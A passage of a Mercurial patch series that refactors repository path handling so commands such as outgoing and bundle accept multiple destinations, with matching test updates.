path.pushloc or path.loc - if subpath is not None: - subpath = urlutil.url(subpath) - if subpath.isabs(): - dest = bytes(subpath) - else: - p = urlutil.url(dest) - p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) - dest = bytes(p) +def _outgoing(ui, repo, dests, opts, subpath=None): + out = set() + others = [] + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + if subpath is 
not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + dest = bytes(subpath) + else: + p = urlutil.url(dest) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + dest = bytes(p) + branches = path.branch, opts.get(b'branch') or [] - branches = path.branch, opts.get(b'branch') or [] - - ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) - revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) - if revs: - revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) + revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) + if revs: + revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] - other = peer(repo, opts, dest) - try: - outgoing = discovery.findcommonoutgoing( - repo, other, revs, force=opts.get(b'force') - ) - o = outgoing.missing - if not o: - scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) - return o, other - except: # re-raises - other.close() - raise + other = peer(repo, opts, dest) + try: + outgoing = discovery.findcommonoutgoing( + repo, other, revs, force=opts.get(b'force') + ) + o = outgoing.missing + out.update(o) + if not o: + scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) + others.append(other) + except: # re-raises + other.close() + raise + # make sure this is ordered by revision number + outgoing_revs = list(out) + cl = repo.changelog + outgoing_revs.sort(key=cl.rev) + return outgoing_revs, others -def _outgoing_recurse(ui, repo, dest, opts): +def _outgoing_recurse(ui, repo, dests, opts): ret = 1 if opts.get(b'subrepos'): ctx = repo[None] for subpath in sorted(ctx.substate): sub = ctx.sub(subpath) - ret = min(ret, sub.outgoing(ui, dest, opts)) + ret = min(ret, sub.outgoing(ui, dests, opts)) return ret @@ -1391,10 +1393,10 @@ yield n -def outgoing(ui, repo, dest, opts, subpath=None): +def outgoing(ui, repo, dests, opts, subpath=None): if opts.get(b'graph'): 
logcmdutil.checkunsupportedgraphflags([], opts) - o, other = _outgoing(ui, repo, dest, opts, subpath=subpath) + o, others = _outgoing(ui, repo, dests, opts, subpath=subpath) ret = 1 try: if o: @@ -1415,11 +1417,13 @@ for n in _outgoing_filter(repo, o, opts): displayer.show(repo[n]) displayer.close() - cmdutil.outgoinghooks(ui, repo, other, opts, o) - ret = min(ret, _outgoing_recurse(ui, repo, dest, opts)) + for oth in others: + cmdutil.outgoinghooks(ui, repo, oth, opts, o) + ret = min(ret, _outgoing_recurse(ui, repo, dests, opts)) return ret # exit code is zero since we found outgoing changes finally: - other.close() + for oth in others: + oth.close() def verify(repo, level=None): diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t --- a/tests/test-exchange-multi-source.t +++ b/tests/test-exchange-multi-source.t @@ -130,6 +130,46 @@ $ cp -R ./branch-E ./branch-E-push $ cp -R ./branch-G ./branch-G-push $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push + comparing with ./branch-E-push + searching for changes + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + | o changeset: 6:c521a06b234b + | | user: test + | | date: Thu Jan 01 00:00:00 1970 +0000 + | | summary: G + | | + | o changeset: 5:2f3a4c5c1417 + | parent: 1:27547f69f254 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: F + | + | o changeset: 4:a603bfb5a83e + | | user: test + | | date: Thu Jan 01 00:00:00 1970 +0000 + | | summary: E + | | + | o changeset: 3:b3325c91a4d9 + |/ user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: D + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + $ hg push --force -R test-repo-bare ./branch-E-push 
./branch-G-push ./branch-H-push pushing to ./branch-E-push searching for changes @@ -291,6 +331,26 @@ $ cp -R ./branch-E ./branch-E-push $ cp -R ./branch-G ./branch-G-push $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default + comparing with ./branch-E-push + searching for changes + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + no changes found + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default pushing to ./branch-E-push searching for changes @@ -349,6 +409,26 @@ $ cp -R ./branch-E ./branch-E-push $ cp -R ./branch-G ./branch-G-push $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + no changes found + comparing with ./branch-E-push + searching for changes + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default pushing to ./branch-G-push searching for changes # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618359255 -7200 # Wed Apr 14 02:14:15 2021 +0200 # Node ID dec31caf5fd68210233a672f8efc6537f684f039 # Parent d4e4ccb75f99f24baa5912885d9360dd5e87cda3 incoming: use `urlutil.get_pull_paths` Lets use the new method to increase code 
reuse. However I did not implement support for multiple source yet. It would be possible create multiple temporary bundle, but that is a bit too much work outside of my current route to make the detour. Differential Revision: https://phab.mercurial-scm.org/D10392 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4311,19 +4311,20 @@ cmdutil.check_incompatible_arguments(opts, b'subrepos', [b'bundle']) if opts.get(b'bookmarks'): - source, branches = urlutil.parseurl( - ui.expandpath(source), opts.get(b'branch') - ) - other = hg.peer(repo, opts, source) - try: - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) - return bookmarks.incoming(ui, repo, other) - finally: - other.close() + srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch')) + for source, branches in srcs: + other = hg.peer(repo, opts, source) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.pager(b'incoming') + ui.status( + _(b'comparing with %s\n') % urlutil.hidepassword(source) + ) + return bookmarks.incoming(ui, repo, other) + finally: + other.close() repo._subtoppath = ui.expandpath(source) try: diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1263,9 +1263,13 @@ (remoterepo, incomingchangesetlist, displayer) parameters, and is supposed to contain only code that can't be unified. 
""" - source, branches = urlutil.parseurl( - ui.expandpath(source), opts.get(b'branch') - ) + srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch')) + srcs = list(srcs) + if len(srcs) != 1: + msg = _('for now, incoming supports only a single source, %d provided') + msg %= len(srcs) + raise error.Abort(msg) + source, branches = srcs[0] other = peer(repo, opts, source) cleanupfn = other.close try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618161534 -7200 # Sun Apr 11 19:18:54 2021 +0200 # Node ID 9519312ecd81fc874a03428cae2515ccf139f53f # Parent dec31caf5fd68210233a672f8efc6537f684f039 outgoing: use `get_push_paths` in the revset too The revsets now use the same code as everyone and is ready for entry in `[paths]` pointing to multiple entries. Differential Revision: https://phab.mercurial-scm.org/D10393 diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1855,30 +1855,29 @@ dest = ( l and getstring(l[0], _(b"outgoing requires a repository path")) or b'' ) - if not dest: + if dest: # ui.getpath() explicitly tests for None, not just a boolean - dest = None - path = repo.ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = path.branch, [] - - revs, checkout = hg.addbranchrevs(repo, repo, branches, []) - if revs: - revs = [repo.lookup(rev) for rev in revs] - other = hg.peer(repo, {}, dest) - try: - repo.ui.pushbuffer() - outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) - repo.ui.popbuffer() - finally: - other.close() + dests = [dest] + else: + dests = [] + missing = set() + for path in urlutil.get_push_paths(repo, repo.ui, dests): + dest = path.pushloc or path.loc + branches = path.branch, [] + + revs, checkout = hg.addbranchrevs(repo, repo, branches, []) + if 
revs: + revs = [repo.lookup(rev) for rev in revs] + other = hg.peer(repo, {}, dest) + try: + repo.ui.pushbuffer() + outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) + repo.ui.popbuffer() + finally: + other.close() + missing.update(outgoing.missing) cl = repo.changelog - o = {cl.rev(r) for r in outgoing.missing} + o = {cl.rev(r) for r in missing} return subset & o # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618389340 -7200 # Wed Apr 14 10:35:40 2021 +0200 # Node ID ebb13f9a9ba8c2e43a7cc927333097864b9bb69d # Parent 9519312ecd81fc874a03428cae2515ccf139f53f urlutil: add a `get_clone_path` function We add a new function with a semantic focussed on `clone` operation (so without an existing repository). I am not certain the return type is the best, but this is what we need for now. Once all caller are migrated we might start thinking about that the API should be. For now that will do. Differential Revision: https://phab.mercurial-scm.org/D10401 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -672,8 +672,8 @@ """ if isinstance(source, bytes): - origsource = ui.expandpath(source) - source, branches = urlutil.parseurl(origsource, branch) + src = urlutil.get_clone_path(ui, source, branch) + origsource, source, branches = src srcpeer = peer(ui, peeropts, source) else: srcpeer = source.peer() # in case we were called with a localrepo diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -471,6 +471,13 @@ yield parseurl(url, default_branches) +def get_clone_path(ui, source, default_branches=()): + """return the `(origsource, path, branch)` selected as clone source""" + url = ui.expandpath(source) + path, branch = parseurl(url, default_branches) + return url, path, branch + + def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' u = url(path) # HG 
changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618390291 -7200 # Wed Apr 14 10:51:31 2021 +0200 # Node ID ae4c0f279282cc8838555fef56eaf615df2f6b3b # Parent ebb13f9a9ba8c2e43a7cc927333097864b9bb69d mq: use the new `get_clone_path` to get the remote url We stop using `ui.expandpath` to use a function with a more defined semantic. This will help us to make it an option to point [paths] entry to multiple destination. Differential Revision: https://phab.mercurial-scm.org/D10402 diff --git a/hgext/mq.py b/hgext/mq.py --- a/hgext/mq.py +++ b/hgext/mq.py @@ -2863,11 +2863,12 @@ # main repo (destination and sources) if dest is None: dest = hg.defaultdest(source) - sr = hg.peer(ui, opts, ui.expandpath(source)) + __, source_path, __ = urlutil.get_clone_path(ui, source) + sr = hg.peer(ui, opts, source_path) # patches repo (source only) if opts.get(b'patches'): - patchespath = ui.expandpath(opts.get(b'patches')) + __, patchespath, __ = urlutil.get_clone_path(ui, opts.get(b'patches')) else: patchespath = patchdir(sr) try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618391754 -7200 # Wed Apr 14 11:15:54 2021 +0200 # Node ID 1998a8311c4873d2e3ee6290f903ee0e680ca82e # Parent ae4c0f279282cc8838555fef56eaf615df2f6b3b urlutil: add a new `get_unique_pull_path` This function is dedicated to call that needs a single destination. Currently most caller actually need that since few actually support multiple destinations (the most importants `hg push` and `hg outgoing` do). So having a clear API point for that will be important when the time comes to have a single `[paths]` alias resolving to multiple urls. 
Differential Revision: https://phab.mercurial-scm.org/D10403 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -471,6 +471,22 @@ yield parseurl(url, default_branches) +def get_unique_pull_path(action, repo, ui, source=None, default_branches=()): + """return a unique `(path, branch)` or abort if multiple are found + + This is useful for command and action that does not support multiple + destination (yet). + + Note that for now, we cannot get multiple destination so this function is "trivial". + + The `action` parameter will be used for the error message. + """ + if source is None: + source = b'default' + url = ui.expandpath(source) + return parseurl(url, default_branches) + + def get_clone_path(ui, source, default_branches=()): """return the `(origsource, path, branch)` selected as clone source""" url = ui.expandpath(source) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618391928 -7200 # Wed Apr 14 11:18:48 2021 +0200 # Node ID 8e6911426b884a744138b1d47d0abded2079472a # Parent 1998a8311c4873d2e3ee6290f903ee0e680ca82e narrow: use `get_unique_pull_path` The narrow's `tracked` command does not support multiple destination, lets use the dedicated API then. Differential Revision: https://phab.mercurial-scm.org/D10404 diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -593,8 +593,8 @@ # Find the revisions we have in common with the remote. These will # be used for finding local-only changes for narrowing. They will # also define the set of revisions to update for widening. 
- remotepath = ui.expandpath(remotepath or b'default') - url, branches = urlutil.parseurl(remotepath) + r = urlutil.get_unique_pull_path(b'tracked', repo, ui, remotepath) + url, branches = r ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618392649 -7200 # Wed Apr 14 11:30:49 2021 +0200 # Node ID a48f15f1c1784ad4f8277f8f8af32d4bcd13664f # Parent 8e6911426b884a744138b1d47d0abded2079472a patchbomb: use `get_unique_pull_path` The patchbomb code does not support multiple destinations yet. It would not be too hard to implemented since `hg outgoing` does. However that is a bit too much of a detour right now. In addition that kind of "select outgoing changesets for processing" code exist for various commands so the best would be to factor it out later. Let us use the dedicated API until this is solved. This comes with a small output change in the test that I find more accurate. So I kept it. 
Differential Revision: https://phab.mercurial-scm.org/D10405 diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -530,9 +530,9 @@ def _getoutgoing(repo, dest, revs): '''Return the revisions present locally but not in dest''' ui = repo.ui - url = ui.expandpath(dest or b'default-push', dest or b'default') - url = urlutil.parseurl(url)[0] - ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) + paths = urlutil.get_push_paths(repo, ui, [dest]) + safe_paths = [urlutil.hidepassword(p.rawloc) for p in paths] + ui.status(_(b'comparing with %s\n') % b','.join(safe_paths)) revs = [r for r in revs if r >= 0] if not revs: diff --git a/tests/test-patchbomb.t b/tests/test-patchbomb.t --- a/tests/test-patchbomb.t +++ b/tests/test-patchbomb.t @@ -2868,7 +2868,7 @@ dest#branch URIs: $ hg email --date '1980-1-1 0:1' -n -t foo -s test -o ../t#test - comparing with ../t + comparing with ../t#test From [test]: test this patch series consists of 1 patches. # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618393090 -7200 # Wed Apr 14 11:38:10 2021 +0200 # Node ID b133154f1e7ba2fbb5a07df6cc1a4671dac1e275 # Parent a48f15f1c1784ad4f8277f8f8af32d4bcd13664f fetch: use `get_unique_pull_path` to retrieve the path The fetch command does not support multiple destination, so we use the new dedicated API for that. 
Differential Revision: https://phab.mercurial-scm.org/D10406 diff --git a/hgext/fetch.py b/hgext/fetch.py --- a/hgext/fetch.py +++ b/hgext/fetch.py @@ -109,11 +109,9 @@ ) ) - other = hg.peer(repo, opts, ui.expandpath(source)) - ui.status( - _(b'pulling from %s\n') - % urlutil.hidepassword(ui.expandpath(source)) - ) + path = urlutil.get_unique_pull_path(b'fetch', repo, ui, source)[0] + other = hg.peer(repo, opts, path) + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(path)) revs = None if opts[b'rev']: try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618394240 -7200 # Wed Apr 14 11:57:20 2021 +0200 # Node ID 368294967c9532721c9b448fbe419bdb832e9d88 # Parent b133154f1e7ba2fbb5a07df6cc1a4671dac1e275 urlutil: add a new `get_unique_push_path` This function is dedicated to call that needs a single destination. Currently most caller actually need that since few actually support multiple destinations (the most importants `hg push` and `hg outgoing` do). So having a clear API point for that will be important when the time comes to have a single `[paths]` alias resolving to multiple urls. Differential Revision: https://phab.mercurial-scm.org/D10407 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -471,6 +471,25 @@ yield parseurl(url, default_branches) +def get_unique_push_path(action, repo, ui, dest=None): + """return a unique `path` or abort if multiple are found + + This is useful for command and action that does not support multiple + destination (yet). + + Note that for now, we cannot get multiple destination so this function is "trivial". + + The `action` parameter will be used for the error message. 
+ """ + if dest is None: + dests = [] + else: + dests = [dest] + dests = list(get_push_paths(repo, ui, dests)) + assert len(dests) == 1 + return dests[0] + + def get_unique_pull_path(action, repo, ui, source=None, default_branches=()): """return a unique `(path, branch)` or abort if multiple are found # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618394487 -7200 # Wed Apr 14 12:01:27 2021 +0200 # Node ID d689d48527ea597345ca204ad23d65e4165a0cbd # Parent 368294967c9532721c9b448fbe419bdb832e9d88 histedit: use `get_unique_push_path` Same as for `pathbomb`, this code does not support multiple destinations yet. It might in the future, probably with code put in common with patchwork, but for now lets use the dedicated API. Differential Revision: https://phab.mercurial-scm.org/D10408 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1041,11 +1041,12 @@ Used by initialization code""" if opts is None: opts = {} - dest = ui.expandpath(remote or b'default-push', remote or b'default') - dest, branches = urlutil.parseurl(dest, None)[:2] + path = urlutil.get_unique_push_path(b'histedit', repo, ui, remote) + dest = path.pushloc or path.loc + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) - revs, checkout = hg.addbranchrevs(repo, repo, branches, None) + revs, checkout = hg.addbranchrevs(repo, repo, (path.branch, []), None) other = hg.peer(repo, opts, dest) if revs: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618396184 -7200 # Wed Apr 14 12:29:44 2021 +0200 # Node ID b5e7cdb93abc3e26d1d80934d32f26362edecde2 # Parent d689d48527ea597345ca204ad23d65e4165a0cbd relink: use `get_unique_pull_path` The code does not support multiple destination and will probably never do so. So lets use the dedicated API for this case. 
Differential Revision: https://phab.mercurial-scm.org/D10409 diff --git a/hgext/relink.py b/hgext/relink.py --- a/hgext/relink.py +++ b/hgext/relink.py @@ -19,7 +19,10 @@ registrar, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) cmdtable = {} command = registrar.command(cmdtable) @@ -62,10 +65,11 @@ util, b'samedevice' ): raise error.Abort(_(b'hardlinks are not supported on this system')) - src = hg.repository( - repo.baseui, - ui.expandpath(origin or b'default-relink', origin or b'default'), - ) + + if origin is None and b'default-relink' in ui.paths: + origin = b'default-relink' + path, __ = urlutil.get_unique_pull_path(b'relink', repo, ui, origin) + src = hg.repository(repo.baseui, path) ui.status(_(b'relinking %s to %s\n') % (src.store.path, repo.store.path)) if repo.root == src.root: ui.status(_(b'there is nothing to relink\n')) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618562812 -7200 # Fri Apr 16 10:46:52 2021 +0200 # Node ID 30ee1224b9a2c0efcf975e3d4b1e2822ca9aa3da # Parent b5e7cdb93abc3e26d1d80934d32f26362edecde2 infinitepush: use `get_unique_pull_path` The extension does not support multiple destination (yet). 
Differential Revision: https://phab.mercurial-scm.org/D10456 diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -684,8 +684,12 @@ def _pull(orig, ui, repo, source=b"default", **opts): opts = pycompat.byteskwargs(opts) # Copy paste from `pull` command - source, branches = urlutil.parseurl( - ui.expandpath(source), opts.get(b'branch') + source, branches = urlutil.get_unique_pull_path( + b"infinite-push's pull", + repo, + ui, + source, + default_branches=opts.get(b'branch'), ) scratchbookmarks = {} # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618562816 -7200 # Fri Apr 16 10:46:56 2021 +0200 # Node ID 0428e555acb78c5cb2d74b2b828db7f4cadd62a3 # Parent 30ee1224b9a2c0efcf975e3d4b1e2822ca9aa3da transplant: use `get_unique_pull_path` The command does not support multiple destination (yet). Differential Revision: https://phab.mercurial-scm.org/D10410 diff --git a/hgext/transplant.py b/hgext/transplant.py --- a/hgext/transplant.py +++ b/hgext/transplant.py @@ -47,6 +47,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) @@ -818,7 +819,8 @@ sourcerepo = opts.get(b'source') if sourcerepo: - peer = hg.peer(repo, opts, ui.expandpath(sourcerepo)) + u = urlutil.get_unique_pull_path(b'transplant', repo, ui, sourcerepo)[0] + peer = hg.peer(repo, opts, u) heads = pycompat.maplist(peer.lookup, opts.get(b'branch', ())) target = set(heads) for r in revs: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618397875 -7200 # Wed Apr 14 12:57:55 2021 +0200 # Node ID c1749dd31cdfee20926465d57d4a5a40a2fb2ebc # Parent 0428e555acb78c5cb2d74b2b828db7f4cadd62a3 remotefilelog: use the right expandpath in to expand `~` Given the context where path is most likely a file system path, I suspect that the initial author confused ui.expandpath and util.expandpath (a proxy for os.path.expanduser and co) 
Differential Revision: https://phab.mercurial-scm.org/D10411 diff --git a/hgext/remotefilelog/__init__.py b/hgext/remotefilelog/__init__.py --- a/hgext/remotefilelog/__init__.py +++ b/hgext/remotefilelog/__init__.py @@ -888,7 +888,7 @@ progress.update(count) count += 1 try: - path = ui.expandpath(os.path.normpath(path)) + path = util.expandpath(os.path.normpath(path)) except TypeError as e: ui.warn(_(b"warning: malformed path: %r:%s\n") % (path, e)) traceback.print_exc() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618398369 -7200 # Wed Apr 14 13:06:09 2021 +0200 # Node ID b6b696442a4dcc34c0b8ec68446f394d7f3e4481 # Parent c1749dd31cdfee20926465d57d4a5a40a2fb2ebc fastannotate: use `get_unique_pull_path` The code does not support multiple destination yet, so lets move it to the dedicated API. Differential Revision: https://phab.mercurial-scm.org/D10412 diff --git a/hgext/fastannotate/protocol.py b/hgext/fastannotate/protocol.py --- a/hgext/fastannotate/protocol.py +++ b/hgext/fastannotate/protocol.py @@ -20,6 +20,9 @@ wireprotov1peer, wireprotov1server, ) +from mercurial.utils import ( + urlutil, +) from . import context # common @@ -151,9 +154,9 @@ def annotatepeer(repo): ui = repo.ui - remotepath = ui.expandpath( - ui.config(b'fastannotate', b'remotepath', b'default') - ) + remotedest = ui.config(b'fastannotate', b'remotepath', b'default') + r = urlutil.get_unique_pull_path(b'fastannotate', repo, ui, remotedest) + remotepath = r[0] peer = hg.peer(ui, {}, remotepath) try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618403713 -7200 # Wed Apr 14 14:35:13 2021 +0200 # Node ID 3f29765e0d9520135c9712ff48eff061c545cd6e # Parent b6b696442a4dcc34c0b8ec68446f394d7f3e4481 lfs: use the new APIs The part of the lfs store that requires a destination cannot operate on multiple destination (yet). So we move them to the dedicated APIs. 
Differential Revision: https://phab.mercurial-scm.org/D10413 diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -22,6 +22,7 @@ wirestore, ) + # During clone this function is passed the src's ui object # but it needs the dest's ui object so it can read out of # the config file. Use repo.ui instead. @@ -31,19 +32,22 @@ if not remote: lfpullsource = getattr(repo, 'lfpullsource', None) - if lfpullsource: - path = ui.expandpath(lfpullsource) - elif put: - path = ui.expandpath(b'default-push', b'default') + if put: + path = urlutil.get_unique_push_path( + b'lfpullsource', repo, ui, lfpullsource + ) else: - path = ui.expandpath(b'default') + path, _branches = urlutil.get_unique_pull_path( + b'lfpullsource', repo, ui, lfpullsource + ) - # ui.expandpath() leaves 'default-push' and 'default' alone if - # they cannot be expanded: fallback to the empty string, - # meaning the current directory. + # XXX we should not explicitly pass b'default', as this will result in + # b'default' being returned if no `paths.default` was defined. We + # should explicitely handle the lack of value instead. if repo is None: - path = ui.expandpath(b'default') - path, _branches = urlutil.parseurl(path) + path, _branches = urlutil.get_unique_pull_path( + b'lfs', repo, ui, b'default' + ) remote = hg.peer(repo or ui, {}, path) elif path == b'default-push' or path == b'default': remote = repo # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618412540 -7200 # Wed Apr 14 17:02:20 2021 +0200 # Node ID 946db89607c8802873c5a4457d07a937c316ee41 # Parent 3f29765e0d9520135c9712ff48eff061c545cd6e bundle: support multiple destinations `hg outgoing` and `hg push` now support multiple destinations. We do the same for `hg bundle`. Various other commands need this kind of behavior and it would be great to factor this code out for their usage. 
However this is an adventure for another time. They are some minor change to the tests (in addition to the new test for the feature): * one because I updated a message to plurals, * another one because the error changed, and I actually find it clearer. Differential Revision: https://phab.mercurial-scm.org/D10414 diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -382,7 +382,10 @@ if btype: opts['type'] = btype try: - commands.bundle(ui, repo, tmpfn, dest, **opts) + dests = [] + if dest: + dests = [dest] + commands.bundle(ui, repo, tmpfn, *dests, **opts) return util.readfile(tmpfn) finally: try: diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1531,10 +1531,10 @@ ), ] + remoteopts, - _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]'), + _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]...'), helpcategory=command.CATEGORY_IMPORT_EXPORT, ) -def bundle(ui, repo, fname, dest=None, **opts): +def bundle(ui, repo, fname, *dests, **opts): """create a bundle file Generate a bundle file containing data to be transferred to another @@ -1545,7 +1545,7 @@ all the nodes you specify with --base parameters. Otherwise, hg will assume the repository has all the nodes in destination, or default-push/default if no destination is specified, where destination - is the repository you provide through DEST option. + is the repositories you provide through DEST option. You can change bundle format with the -t/--type option. See :hg:`help bundlespec` for documentation on this format. 
By default, @@ -1590,9 +1590,9 @@ ) if opts.get(b'all'): - if dest: + if dests: raise error.InputError( - _(b"--all is incompatible with specifying a destination") + _(b"--all is incompatible with specifying destinations") ) if opts.get(b'base'): ui.warn(_(b"ignoring --base because --all was specified\n")) @@ -1605,31 +1605,54 @@ ) if base: - if dest: + if dests: raise error.InputError( - _(b"--base is incompatible with specifying a destination") + _(b"--base is incompatible with specifying destinations") ) common = [repo[rev].node() for rev in base] heads = [repo[r].node() for r in revs] if revs else None outgoing = discovery.outgoing(repo, common, heads) + missing = outgoing.missing + excluded = outgoing.excluded else: - dest = ui.expandpath(dest or b'default-push', dest or b'default') - dest, branches = urlutil.parseurl(dest, opts.get(b'branch')) - other = hg.peer(repo, opts, dest) - revs = [repo[r].hex() for r in revs] - revs, checkout = hg.addbranchrevs(repo, repo, branches, revs) - heads = revs and pycompat.maplist(repo.lookup, revs) or revs - outgoing = discovery.findcommonoutgoing( - repo, - other, - onlyheads=heads, - force=opts.get(b'force'), - portable=True, + missing = set() + excluded = set() + for path in urlutil.get_push_paths(repo, ui, dests): + other = hg.peer(repo, opts, path.rawloc) + if revs is not None: + hex_revs = [repo[r].hex() for r in revs] + else: + hex_revs = None + branches = (path.branch, []) + head_revs, checkout = hg.addbranchrevs( + repo, repo, branches, hex_revs + ) + heads = ( + head_revs + and pycompat.maplist(repo.lookup, head_revs) + or head_revs + ) + outgoing = discovery.findcommonoutgoing( + repo, + other, + onlyheads=heads, + force=opts.get(b'force'), + portable=True, + ) + missing.update(outgoing.missing) + excluded.update(outgoing.excluded) + + if not missing: + scmutil.nochangesfound(ui, repo, not base and excluded) + return 1 + + if heads: + outgoing = discovery.outgoing( + repo, missingroots=missing, ancestorsof=heads 
